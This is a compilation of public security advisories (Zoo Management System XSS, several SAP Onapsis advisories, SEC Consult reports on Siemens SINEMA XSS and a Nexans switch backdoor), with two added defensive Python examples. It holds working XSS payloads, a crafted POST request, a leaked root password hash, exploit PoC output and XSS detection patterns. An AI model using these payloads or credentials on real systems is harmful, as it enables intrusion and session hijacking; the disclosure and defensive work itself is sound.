<pre><code># Exploit Title: Zoo Management System 1.0 - Reflected Cross-Site-Scripting (XSS)<br /># Date: 06/22/2022<br /># Exploit Author: Angelo Pio Amirante<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/15344/zoo-management-system-phpoop-free-source-code.html<br /># Version: 1.0<br /># Tested on: Server: XAMPP on Windows 10 <br /># CVE: CVE-2022-31897<br /><br /># Description:<br />Zoo Management System 1.0 is vulnerable to reflected cross-site scripting on the sign-up page. The "msg" parameter in 'http://localhost/public_html/register_visitor?msg=' is vulnerable.<br /><br /># Impact:<br />An attacker could steal cookies with a crafted URL sent to the victims.<br /><br /># Exploit:<br /><br />Visit the following page: <br /><br />1) http://localhost/public_html/register_visitor?msg=<script>alert(window.navigator.userAgent)</script><br /><br />2) Alert pop up is fired!<br /><br /><br /># Image poc:<br /><br />https://ibb.co/8XKDgJX -> Registration page<br />https://ibb.co/mTTmTmy -> XSS<br /><br /> <br /></code></pre>
<pre><code># Onapsis Security Advisory 2022-0007: Directory Traversal vulnerability in<br />SAP Focused Run (Simple Diagnostics Agent 1.0)<br /><br /><br />## Impact on Business<br /><br />Exposing the contents of a directory can disclose information useful to an<br />attacker for devising exploits, such as file creation times or anything<br />encoded in file names. The directory listing may also expose private or<br />confidential data.<br /><br /><br />## Advisory Information<br /><br />- Public Release Date: 06/21/2022<br />- Security Advisory ID: ONAPSIS-2022-0007<br />- Researcher(s): Yvan Genuer<br /><br /><br />## Vulnerability Information<br /><br />- Vendor: SAP<br />- Affected Components:<br /> - SIMPLE_DIAGNOSTICS_AGENT 1.0<br /><br /> (Check SAP Note 3159091 for detailed information on affected releases)<br /><br />- Vulnerability Class: CWE-548<br />- CVSS v3 score: 2.7 AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N<br />- Risk Level: Low<br />- Assigned CVE: CVE-2022-27657<br />- Vendor patch Information: SAP Security NOTE 3159091<br /><br /><br />## Affected Components Description<br /><br />SAP Focused Run is a spin-off from SAP Solution Manager concentrating on the<br />specific needs of high-volume system and application monitoring, alerting<br />and analytics.<br />(https://support.sap.com/en/alm/sap-focused-run/expert-portal/)<br /><br /><br />## Vulnerability Details<br /><br />A path traversal exists in the Simple Diagnostic Agent service listening, by<br />default, on localhost port 3005.<br />
A local attacker without particular privileges can use it to display the<br />content of the directory as the ```sapadm``` OS user, leading to<br />information disclosure of potentially sensitive data.<br /><br /><br />## Solution<br /><br />SAP has released SAP Note 3159091, which provides patched versions of the<br />affected components.<br /><br />The patches can be downloaded from<br />https://launchpad.support.sap.com/#/notes/3159091.<br /><br />Onapsis strongly recommends that SAP customers download the related<br />security fixes and apply them to the affected components in order to<br />reduce business risks.<br /><br /><br />## Report Timeline<br /><br /> - 01/28/2022: Onapsis sends details to SAP<br /> - 02/02/2022: SAP provides internal ID<br /> - 04/12/2022: SAP releases SAP Note fixing the issue.<br /> - 06/21/2022: Advisory published<br /><br /><br />## References<br /><br />- Onapsis blogpost:<br />https://onapsis.com/blog/sap-security-patch-day-april-2022-focus-spring4shell-and-sap-mii<br />- CVE Mitre:<br />https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27657<br />- Vendor Patch:<br />https://launchpad.support.sap.com/#/notes/3159091<br /><br /><br />## About Onapsis Research Labs<br /><br />Onapsis Research Labs provides the industry analysis of key security<br />issues that impact business-critical systems and applications.<br />Delivering frequent and timely security and compliance advisories with<br />associated risk levels, Onapsis Research Labs combines in-depth knowledge<br />and experience to deliver technical and business context with sound<br />security judgment to the broader information security community.<br /><br />Find all reported vulnerabilities at<br />https://github.com/Onapsis/vulnerability_advisories<br /><br /><br />## About Onapsis, Inc.<br /><br />Onapsis protects the mission-critical applications that run the global<br />economy, from the core to the cloud.<br />
The Onapsis Platform uniquely delivers<br />actionable<br />insight, secure change, automated governance and continuous monitoring for<br />critical<br />systems—ERP, CRM, PLM, HCM, SCM and BI applications—from leading vendors<br />such as SAP,<br />Oracle, Salesforce and others, while keeping them protected and compliant.<br /><br />For more information, connect with us on Twitter or LinkedIn, or visit us at<br />https://www.onapsis.com.<br /><br />-- <br />This email and any files transmitted with it are confidential and intended <br />solely for the use of the individual or entity to whom they are addressed. <br />If you have received this email in error please notify the system manager. <br />This message contains confidential information and is intended only for the <br />individual named. If you are not the named addressee you should not <br />disseminate, distribute or copy this e-mail.<br />Please notify the sender <br />immediately by e-mail if you have received this e-mail by mistake and <br />delete this e-mail from your system. If you are not the intended recipient <br />you are notified that disclosing, copying, distributing or taking any <br />action in reliance on the contents of this information is strictly <br />prohibited.<br /><br /></code></pre>
<pre><code># Onapsis Security Advisory 2022-0005: Cross-Site Scripting (XSS)<br />vulnerability in SAP Fiori launchpad<br /><br /><br />## Impact on Business<br /><br />Impact depends on the victim's privileges. In most cases, a successful<br />attack allows an attacker to hijack a session, force the victim to perform<br />undesired requests in the SAP system (CSRF), or redirect the victim to an<br />arbitrary web site (open redirect).<br /><br /><br />## Advisory Information<br /><br />- Public Release Date: 06/21/2022<br />- Security Advisory ID: ONAPSIS-2022-0005<br />- Researcher(s): Yvan Genuer<br /><br /><br />## Vulnerability Information<br /><br />- Vendor: SAP<br />- Affected Components:<br /> - SAP_UI 753<br /> - SAP_UI 754<br /> - SAP_UI 755<br /> - SAP_UI 756<br /> - SAP_BASIS 787<br /><br /> (Check SAP Note 3149805 for detailed information on affected releases)<br /><br />- Vulnerability Class: CWE-79<br />- CVSS v3 score: 8.2 AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N<br />- Risk Level: High<br />- Assigned CVE: CVE-2022-26101<br />- Vendor patch Information: SAP Security NOTE 3149805<br /><br /><br />## Affected Components Description<br /><br />SAP Fiori launchpad is the entry point to the ABAP platform for SAP Fiori<br />apps on mobile and desktop devices.<br /><br /><br />## Vulnerability Details<br /><br />During navigation in SAP Fiori Launchpad, it is possible to provide a custom<br />theme name using the URL parameter ```sap-theme```. This parameter has an<br />option to provide the path to a .css file, which is used directly in the<br />page generation. This optional input is not sufficiently sanitized, allowing<br />an attacker to inject an arbitrary HTML payload into the requested page.<br /><br /><br />## Solution<br /><br />SAP has released SAP Note 3149805, which provides patched versions of the<br />affected components.<br /><br />The patches can be downloaded from<br />https://launchpad.support.sap.com/#/notes/3149805.<br /><br />Onapsis strongly recommends that SAP customers download the related<br />security fixes and apply them to the affected components in order to<br />reduce business risks.<br /><br /><br />## Report Timeline<br /><br /> - 01/28/2022: Onapsis sends details to SAP<br /> - 02/09/2022: SAP provides internal ID<br /> - 03/08/2022: SAP releases SAP Note fixing the issue.<br /> - 06/21/2022: Advisory published<br /><br /><br />## References<br /><br />- Onapsis blogpost:<br />https://onapsis.com/blog/sap-security-patch-day-march-2022-sap-focused-run-affected-several-vulnerabilities<br />- CVE Mitre:<br />https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26101<br />- Vendor Patch:<br />https://launchpad.support.sap.com/#/notes/3149805<br />- Vendor FAQ:<br />https://launchpad.support.sap.com/#/notes/3157089<br /><br /></code></pre>
<pre><code># Onapsis Security Advisory 2022-0004: Missing Authentication check in SAP<br />Focused Run (Simple Diagnostics Agent 1.0)<br /><br /><br />## Impact on Business<br /><br />Because the Simple Diagnostic Agent (SDA) handles several important<br />configuration and critical credential information, a successful attack<br />could lead to the control of the SDA, and therefore affect:<br /> * Integrity, by modifying the configuration.<br /> * Availability, by stopping the service.<br /> * Confidentiality and scope change, by decrypting all stored credentials<br />and then accessing the SAP Focused Run system as well as the SAP system<br />managed by the SDA.<br /><br /><br />## Advisory Information<br /><br />- Public Release Date: 06/21/2022<br />- Security Advisory ID: ONAPSIS-2022-0004<br />- Researcher(s): Yvan Genuer<br /><br /><br />## Vulnerability Information<br /><br />- Vendor: SAP<br />- Affected Components:<br /> - SIMPLE_DIAGNOSTICS_AGENT 1.0<br /><br /> (Check SAP Note 3145987 for detailed information on affected releases)<br /><br />- Vulnerability Class: CWE-306<br />- CVSS v3 score: 9.3 AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H<br />- Risk Level: Critical<br />- Assigned CVE: CVE-2022-24396<br />- Vendor patch Information: SAP Security NOTE 3145987<br /><br /><br />## Affected Components Description<br /><br />SAP Focused Run is a spin-off from SAP Solution Manager concentrating on the<br />specific needs of high-volume system and application monitoring, alerting<br />and analytics.<br />(https://support.sap.com/en/alm/sap-focused-run/expert-portal/)<br /><br /><br />## Vulnerability Details<br /><br />Vulnerability 1:<br /><br />No authentication is required to interact with the Simple Diagnostic Agent<br />HTTP service, which listens on port 3005 by default. Therefore,<br />unauthenticated attackers have full access to administrative and other<br />privileged functionality. Leveraging this access, they are able to read,<br />modify or delete sensitive information and configuration with sapadm OS<br />user privileges.<br /><br />Vulnerability 2:<br /><br />A path traversal exists in the Simple Diagnostic Agent service listening, by<br />default, on localhost port 3005. A local attacker without particular<br />privileges can abuse this flaw to display the content of any OS directory<br />that ```sapadm``` has access to, leading to information disclosure of<br />potentially sensitive data.<br /><br /><br />## Solution<br /><br />SAP has released SAP Note 3145987, which provides patched versions of the<br />affected components.<br /><br />The patches can be downloaded from<br />https://launchpad.support.sap.com/#/notes/3145987.<br /><br />Onapsis strongly recommends that SAP customers download the related<br />security fixes and apply them to the affected components in order to<br />reduce business risks.<br /><br /><br />## Report Timeline<br /><br /> - 01/28/2022: Onapsis sends details to SAP<br /> - 02/02/2022: SAP provides internal ID<br /> - 03/08/2022: SAP releases SAP Note fixing the issue.<br /> - 06/21/2022: Advisory published.<br /><br /><br />## References<br /><br />- Onapsis blogpost:<br />https://onapsis.com/blog/sap-security-patch-day-march-2022-sap-focused-run-affected-several-vulnerabilities<br />- CVE Mitre:<br />https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24396<br />- Vendor Patch:<br />https://launchpad.support.sap.com/#/notes/3145987<br /><br /></code></pre>
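<p>Added example, not SAP's or Onapsis' code: a Python directory-listing handler of the kind the two Simple Diagnostics Agent advisories describe, showing the two controls they report as missing, a required token on the local service (the header name X-Agent-Token is an assumption) and a realpath/commonpath containment check that refuses any path resolving outside an allowed root. The directory tree is constructed in a temporary folder.</p>

```python
"""Confined directory listing behind a token check for a local
diagnostics-style agent service.

Added example, not SAP's or Onapsis' code. It shows the two controls the
Simple Diagnostics Agent advisories report as missing: authentication on
the local HTTP service, and containment of a client-supplied path inside an
allowed root. The header name X-Agent-Token and the handler shape are
assumptions; the directory tree is constructed in a temporary folder.
"""
import hmac
import os
import tempfile
from dataclasses import dataclass
from typing import Optional


@dataclass
class Response:
    status: int
    body: str


class DirectoryLister:
    def __init__(self, allowed_root: str, api_token: str):
        # realpath resolves symlinks up front so the containment check
        # compares canonical paths, not the strings the client sent.
        self.root = os.path.realpath(allowed_root)
        self.token = api_token

    def _authorized(self, headers: dict) -> bool:
        # Constant-time comparison; a missing header compares as "".
        return hmac.compare_digest(headers.get("X-Agent-Token", ""), self.token)

    def _resolve(self, requested: str) -> Optional[str]:
        """Canonicalise root/requested and keep it only if it stays under root.
        Absolute paths and ../ sequences both end up outside and are refused."""
        candidate = os.path.realpath(os.path.join(self.root, requested))
        try:
            inside = os.path.commonpath([self.root, candidate]) == self.root
        except ValueError:  # paths on different drives (Windows)
            inside = False
        return candidate if inside else None

    def list_dir(self, headers: dict, requested: str) -> Response:
        """Handle one 'list this directory' request."""
        if not self._authorized(headers):
            return Response(401, "authentication required")
        target = self._resolve(requested)
        if target is None:
            return Response(400, "path outside allowed root")
        if not os.path.isdir(target):
            return Response(404, "not a directory")
        return Response(200, "\n".join(sorted(os.listdir(target))))


def demo() -> dict:
    """Exercise the handler against a constructed tree; returns the outcomes."""
    with tempfile.TemporaryDirectory() as tmp:
        os.makedirs(os.path.join(tmp, "logs", "agent"))
        with open(os.path.join(tmp, "logs", "agent", "trace.log"), "w"):
            pass
        lister = DirectoryLister(tmp, api_token="constructed-demo-token")
        good = {"X-Agent-Token": "constructed-demo-token"}
        return {
            "no_token": lister.list_dir({}, "logs").status,
            "wrong_token": lister.list_dir({"X-Agent-Token": "guess"}, "logs").status,
            "listing": lister.list_dir(good, "logs/agent"),
            "traversal": lister.list_dir(good, "logs/../../../../etc").status,
            "absolute": lister.list_dir(good, "/etc").status,
            "missing": lister.list_dir(good, "logs/nope").status,
        }


if __name__ == "__main__":
    for case, outcome in demo().items():
        print(case, outcome)
```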
<pre><code># Onapsis Security Advisory 2022-0003: Cross-Site Scripting (XSS)<br />vulnerability in SAP Focused Run (Real User Monitoring)<br /><br /><br />## Impact on Business<br /><br />Impact depends on the victim's privileges. In most cases, a successful<br />attack allows an attacker to hijack a session, or force the victim to<br />perform undesired requests in SAP Focused Run.<br /><br /><br />## Advisory Information<br /><br />- Public Release Date: 06/21/2022<br />- Security Advisory ID: ONAPSIS-2022-0003<br />- Researcher(s): Yvan Genuer<br /><br /><br />## Vulnerability Information<br /><br />- Vendor: SAP<br />- Affected Components:<br /> - FRUN 2.00<br /> - FRUN 3.00<br /><br /> (Check SAP Note 3147283 for detailed information on affected releases)<br /><br />- Vulnerability Class: CWE-79<br />- CVSS v3 score: 5.4 AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N<br />- Risk Level: Medium<br />- Assigned CVE: CVE-2022-24399<br />- Vendor patch Information: SAP Security NOTE 3147283<br /><br /><br />## Affected Components Description<br /><br />SAP Focused Run is a spin-off from SAP Solution Manager concentrating on the<br />specific needs of high-volume system and application monitoring, alerting<br />and analytics.<br />(https://support.sap.com/en/alm/sap-focused-run/expert-portal/)<br /><br /><br />## Vulnerability Details<br /><br />The SAP Focused Run REST service ```/sap/bc/rest/rumupload``` does not<br />sufficiently sanitize an input in the multipart/form-data body, leading to a<br />cross-site scripting (XSS) vulnerability in the generated error page.<br /><br /><br />## Solution<br /><br />SAP has released SAP Note 3147283, which provides patched versions of the<br />affected components.<br /><br />The patches can be downloaded from<br />https://launchpad.support.sap.com/#/notes/3147283.<br /><br />Onapsis strongly recommends that SAP customers download the related<br />security fixes and apply them to the affected components in order to<br />reduce business risks.<br /><br /><br />## Report Timeline<br /><br /> - 01/28/2022: Onapsis sends details to SAP<br /> - 02/02/2022: SAP provides internal ID<br /> - 03/08/2022: SAP releases SAP Note fixing the issue.<br /> - 06/21/2022: Advisory published.<br /><br />## References<br /><br />- Onapsis blogpost:<br />https://onapsis.com/blog/sap-security-patch-day-march-2022-sap-focused-run-affected-several-vulnerabilities<br />- CVE Mitre:<br />https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24399<br />- Vendor Patch:<br />https://launchpad.support.sap.com/#/notes/3147283<br /><br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20220614-0 ><br />=======================================================================<br /> title: Reflected Cross Site Scripting<br /> product: SIEMENS-SINEMA Remote Connect<br /> vulnerable version: <=V3.0.1.0-01.01.00.02<br /> fixed version: V3.1.0<br /> CVE number: CVE-2022-29034<br /> impact: medium<br /> homepage: https://siemens.com<br /> found: 2022-03-01<br /> by: S. Robertz (Office Vienna)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"Siemens is a technology company focused on industry, infrastructure,<br />transport, and healthcare.<br /> From more resource-efficient factories, resilient supply chains, and smarter<br />buildings and grids, to cleaner and more comfortable transportation as well as<br />advanced healthcare, we create technology with purpose adding real value for<br />customers. By combining the real and the digital worlds, we empower our<br />customers to transform their industries and markets, helping them to transform<br />the everyday for billions of people."<br /><br />"SINEMA Remote Connect is the management platform for remote networks. 
It is a<br />server application that enables the simple management of tunnel connections<br />(VPN) between headquarters, service technicians, and installed machines or<br />plants."<br /><br /><br />Source: https://www.siemens.com<br />Source: https://new.siemens.com/global/en/products/automation/industrial-communication/industrial-remote-communication/remote-networks/sinema-remote-connect-access-service.html<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides a patch which should be installed immediately.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Reflected Cross Site Scripting (CVE-2022-29034)<br />The application contains a reflected cross-site-scripting vulnerability that<br />can be used to execute JavaScript code in the victim's browser.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Reflected Cross Site Scripting (CVE-2022-29034)<br />The error occurs when setting the syslog server to an illegal IP address. An<br />error message will pop up and will reflect the supplied IP address. However,<br />the popup message does not use the proper jQuery method, and thus allows<br />JavaScript code to be injected.<br />
Note that dots can not be used in the JavaScript<br />payload, as they will get filtered by the IP parser that runs beforehand.<br />This was circumvented by supplying the JavaScript code in base64.<br /><br />The following request can be used to trigger the XSS:<br /><br />POST /services/syslog_client_settings HTTP/1.1<br />Host: $host<br />Cookie: sessionid=708xmctjzk39og596jp4q4r1udfom4l5;<br />csrftoken=sP8NzwJozla1k18xrRzsXiY0zq16IyBddtlDA1C5BC1Orf0oGcqUPr2bpUv1VGLu<br />Content-Length: 153<br />X-Requested-With: XMLHttpRequest<br />X-Csrftoken: U5AQMbPh3JTcdfdBkgIvaLtoitpS7jUVFJNGNGIY50KZkt5szBzX2Uxz8XTNkr4c<br />Referer: https://$host/services/syslog_client_settings<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Connection: close<br /><br />address=127.0.0.1.<script>eval(atob("YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="))</script>&port=1234&protocol=tcp&client_authentication=false&certificate=62&mode=<br /><br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following version has been tested and found to be vulnerable:<br />* V3.0.1.0-01.01.00.02<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2022-04-01: Sending advisory via productcert@siemens.com<br />2022-04-01: Issue tracked by Siemens under case #29947<br />2022-04-19: Siemens confirms vulnerability. Patch available mid May.<br /> Coordinated advisory release date for 2022-06-14.<br />2022-06-07: Asking for fixed versions & CVE numbers.<br />2022-06-14: Coordinated advisory release.<br /><br /><br />Solution:<br />---------<br />Version V3.1.0 fixes our identified issues as well as other security<br />vulnerabilities according to the vendor.<br />
The firmware can be downloaded here:<br />https://support.industry.siemens.com/cs/ww/en/view/109811169/<br /><br />The vendor published a security advisory as well:<br />https://cert-portal.siemens.com/productcert/html/ssa-484086.html<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF S. Robertz / @2022<br /><br /></code></pre>
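<p>Added example (not code from any advisory, vendor or researcher on this page): a Python triage routine that scans captured requests for the reflected-XSS probes described in the Zoo Management System (msg), SAP Fiori launchpad (sap-theme) and SINEMA Remote Connect (address) reports, undoing URL encoding and decoding any atob() base64 argument so an analyst sees the injected markup rather than its disguise. The request tuples are constructed; the parameter names and paths come from the advisories.</p>

```python
"""Triage captured HTTP requests for reflected-XSS probes in parameters.

Constructed example for the advisories above; not code from any vendor or
researcher named on this page. Input is a list of (method, url, body)
tuples such as a reverse proxy or WAF would log, where body is the raw
application/x-www-form-urlencoded string ("" for GET).
"""
import base64
import binascii
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Heuristic rules run against each decoded parameter value. They are
# triage aids, not a filter: output encoding in the application is the fix.
RULES = [
    ("script-tag", re.compile(r"<\s*/?\s*script\b", re.I)),
    ("html-tag", re.compile(r"<\s*[a-z][a-z0-9-]*[^>]*>", re.I)),
    ("event-handler", re.compile(r"\bon[a-z]+\s*=", re.I)),
    ("js-uri", re.compile(r"javascript\s*:", re.I)),
    ("eval-atob", re.compile(r"\b(?:eval|atob)\s*\(", re.I)),
]
# atob('...') argument, so obfuscated payloads can be shown decoded.
ATOB_ARG = re.compile(r"""atob\s*\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)""")


def decode_value(raw: str) -> str:
    """Undo URL-encoding repeatedly (bounded), so %3Cscript%3E and the
    double-encoded %253Cscript%253E both surface as <script>."""
    value = raw
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def decode_atob(value: str) -> list[str]:
    """Return the plaintext of every atob('...') argument in the value."""
    out = []
    for b64 in ATOB_ARG.findall(value):
        try:
            out.append(base64.b64decode(b64, validate=True).decode("utf-8", "replace"))
        except (binascii.Error, ValueError):
            continue  # not valid base64; leave it to the pattern rules
    return out


def extract_params(method: str, url: str, body: str) -> list[tuple[str, str]]:
    """Name/value pairs from the query string and, for POST, the body.
    keep_blank_values keeps an empty 'msg=' visible to the analyst."""
    params = list(parse_qsl(urlsplit(url).query, keep_blank_values=True))
    if method.upper() == "POST" and body:
        params += parse_qsl(body, keep_blank_values=True)
    return params


def scan_request(method: str, url: str, body: str = "") -> list[dict]:
    """One finding per (parameter, rule) hit, with any atob() payload decoded."""
    findings = []
    for name, raw in extract_params(method, url, body):
        value = decode_value(raw)
        for rule, pattern in RULES:
            if pattern.search(value):
                findings.append({
                    "path": urlsplit(url).path,
                    "param": name,
                    "rule": rule,
                    "decoded_atob": decode_atob(value),
                })
    return findings


# Constructed sample traffic shaped like the advisories' parameters.
SAMPLE_REQUESTS = [
    # Benign registration page load with an ordinary status message.
    ("GET", "/public_html/register_visitor?msg=Account+created", ""),
    # Probe against the 'msg' parameter (Zoo Management System report).
    ("GET", "/public_html/register_visitor?msg=%3Cscript%3Ealert(1)%3C/script%3E", ""),
    # Syslog settings POST shaped like the SINEMA Remote Connect report.
    ("POST", "/services/syslog_client_settings",
     'address=127.0.0.1.<script>eval(atob("YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="))</script>'
     "&port=1234&protocol=tcp"),
    # Legitimate syslog settings change.
    ("POST", "/services/syslog_client_settings", "address=10.0.0.5&port=514&protocol=udp"),
]


def triage(requests=SAMPLE_REQUESTS) -> list[dict]:
    """Scan a batch of requests and return all findings."""
    findings = []
    for method, url, body in requests:
        findings.extend(scan_request(method, url, body))
    return findings


if __name__ == "__main__":
    for finding in triage():
        print(finding)
```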
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20220615-0 ><br />=======================================================================<br /> title: Hardcoded Backdoor User and Outdated Software Components<br /> product: Nexans FTTO GigaSwitch industrial/office switches HW version 5<br /> vulnerable version: See "Vulnerable / tested versions"<br /> fixed version: V6.02N, V7.02<br /> CVE number: CVE-2022-32985<br /> impact: High<br /> homepage: https://www.nexans.com/<br /> found: 2020-05-25<br /> by: T. Weber (Office Vienna)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"As a global player in the cable industry, Nexans is behind the scenes<br />delivering the innovative services and resilient products that carry thousands<br />of watts of energy and terabytes of data per second around the world. Millions<br />of homes, cities, businesses are powered every day by Nexans’ high-quality<br />sustainable cabling solutions. 
We help our customers meet the challenges they<br />face in the fields of energy infrastructure, energy resources, transport,<br />buildings, telecom and data, providing them with solutions and services for the<br />most complex cable applications in the most demanding environments."<br /><br />Source: https://www.nexans.com/company/What-we-do.html<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides a patch which should be installed immediately.<br /><br />SEC Consult recommends performing a thorough security review of these<br />products, conducted by security professionals, to identify and resolve all<br />security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Outdated Vulnerable Software Components<br />A static scan with the IoT Inspector (ONEKEY) revealed outdated software packages that<br />are used in the devices' firmware. Four of them were verified by using the<br />MEDUSA scalable firmware runtime.<br /><br /><br />2) Hardcoded Backdoor User (CVE-2022-32985)<br />A hardcoded root user was found in "/etc/passwd".<br />
In combination with the dropbear SSH daemon invoked from the libnx_apl.so<br />library, it can be used on ports 50200 and 50201 to log in to a system shell.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Outdated Vulnerable Software Components<br />Based on an automated scan with the IoT Inspector (ONEKEY), the following third party<br />software packages were found to be outdated:<br /><br />Firmware version 6.02L:<br />BusyBox 1.20.2<br />Dropbear SSH 2012.55<br />GNU glibc 2.17<br />lighttpd 1.4.48<br />OpenSSL 1.0.2h<br /><br />The following CVEs were verified with MEDUSA scalable firmware emulation:<br /><br />* CVE-2015-9261 (Unzip)<br />The crafted ZIP archive "x_6170921383890712452.bin" was taken from:<br />https://www.openwall.com/lists/oss-security/2015/10/25/3<br />Execution inside the firmware emulation:<br /><br />bash-4.2# unzip x_6170921383890712452.bin<br />Archive: x_6170921383890712452.bin<br /> inflating: ]3j½r«IK-%Ix<br />do_page_fault(): sending SIGSEGV to unzip for invalid read access from 735ededc<br />epc = 0044bb28 in busybox[400000+99000]<br />ra = 0044b968 in busybox[400000+99000]<br />Segmentation fault<br /><br /><br />* CVE-2015-0235 (gethostbyname "GHOST" buffer overflow)<br /><br />PoC code was taken from:<br />https://gist.github.com/dweinstein/66e6a088191ac0e8105c<br /><br /><br />* CVE-2015-7547 (getaddrinfo buffer overflow)<br /><br />PoC code was taken from:<br />https://github.com/fjserna/CVE-2015-7547<br /><br />-bash-4.4# python /medusa_exploits/cve-2015-7547-poc.py &<br />[1] 259<br />-bash-4.4# chroot /medusa_rootfs/ bin/bash<br />bash-4.2# cd /medusa_exploits/<br />bash-4.2# ./cve-2015-7547_glibc_getaddrinfo<br />[UDP] Total Data len recv 36<br />[UDP] Total Data len recv 36<br />Connected with 127.0.0.1:34356<br />[TCP] Total Data len recv 76<br />[TCP] Request1 len recv 36<br />[TCP] Request2 len recv 36<br />Segmentation fault<br /><br /><br />* CVE-2017-16544 (shell autocompletion vulnerability)<br
/><br />A file with the name "\ectest\n\e]55;test.txt\a" was created to trigger the<br />vulnerability.<br />-------------------------------------------------------------------------------<br /># ls "pressing <TAB>"<br />test<br />]55;test.txt<br />#<br />-------------------------------------------------------------------------------<br /><br /><br />2) Hardcoded Backdoor User (CVE-2022-32985)<br />The hardcoded system user, reachable via the dropbear SSH daemon was found due<br />to multiple indications on the system. The undocumented root user itself was<br />contained in the "passwd" file:<br /><br />Content of the file "/etc/passwd".<br />-------------------------------------------------------------------------------<br />root:oFQzvQf5qrI56:0:0:root:/home/root:/bin/sh<br />[...]<br />-------------------------------------------------------------------------------<br /><br />A suspicious port for the SSH daemon was chosen in the config file of dropbear:<br /><br />Content of the file "/etc/init.d/dropbear":<br />-------------------------------------------------------------------------------<br />PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin<br />DAEMON=/usr/sbin/dropbear<br />NAME=dropbear<br />DESC="Dropbear SSH server"<br />PIDFILE=/var/run/dropbear.pid<br /><br />DROPBEAR_PORT="50200 -p 50201"<br />[...]<br />-------------------------------------------------------------------------------<br /><br />This is invoked from "/usr/lib/libnx_apl.so.0.0.0", which can be seen in the<br />following pseudo-code:<br />-------------------------------------------------------------------------------<br />void dropbear_server_init(char param_1)<br /><br />{<br /> __pid_t __pid;<br /> char *pcVar1;<br /> int aiStack16 [2];<br /><br /> __pid = fork();<br /> if (__pid == 0) {<br /> __pid = fork();<br /> if (__pid != 0) {<br /> /* WARNING: Subroutine does not return */<br /> exit(0);<br /> }<br /> if (param_1 == '\0') {<br /> pcVar1 = "/etc/init.d/dropbear 
stop";<br /> }<br /> else {<br /> pcVar1 = "/etc/init.d/dropbear start"; <---<br /> }<br /> execl("/bin/sh","sh",&DAT_2cd91564,pcVar1,0);<br /> }<br /> else {<br /> waitpid(__pid,aiStack16,0);<br /> }<br /> return;<br />}<br />-------------------------------------------------------------------------------<br /><br /><br />This function is called if a specific command is issued in the CLI interface:<br />-------------------------------------------------------------------------------<br />[...]<br /> iVar6 = telnet_cmp_command((char *)(param_3 + 0xf2),"ssh",2);<br /> if (iVar6 != 0) {<br /> if (param_2 < 4) {<br /> netbuf_fwd_sprintf(param_1,"\r\n%%Error: Parameter missing\r\n");<br /> iVar6 = shared_mem_get_addr(&var_shm);<br /> iVar7 = shared_mem_get_addr(&var_shm);<br /> uVar8 = shared_mem_read_u8(&var_shm,iVar7 + 0x161a);<br /> shared_mem_write_u8(&var_shm,iVar6 + 0x161a,uVar8 & 0xff | 0x10);<br /> return;<br /> }<br /> iVar6 = telnet_cmp_command((char *)(param_3 + 0x16b),"start",1);<br /> if (iVar6 != 0) {<br /> dropbear_server_init('\x01'); <---<br /> netbuf_fwd_sprintf(param_1,"Starting dropbear...\r\n");<br /> return;<br /> }<br /> iVar6 = telnet_cmp_command((char *)(param_3 